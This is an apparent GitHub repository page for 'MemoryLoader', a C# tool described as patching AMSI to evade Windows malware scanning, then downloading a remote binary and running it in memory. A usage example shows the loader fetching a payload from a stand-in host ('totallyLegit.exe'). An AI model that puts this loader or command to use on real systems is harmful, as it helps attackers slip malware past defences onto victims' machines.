SolomonSklash / MemoryLoader

A .NET binary loader that bypasses AMSI

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

MemoryLoader

A .NET binary loader that bypasses AMSI checks. It will patch AMSI, download a remote binary, and execute it in memory without the binary every hitting disk.

Usage:

./MemoryLoader.exe [URL_TO_PAYLOAD]

Example:
./MemoryLoader.exe http://example.com/totallyLegit.exe

About

A .NET binary loader that bypasses AMSI


Languages

Language:C# 100.0%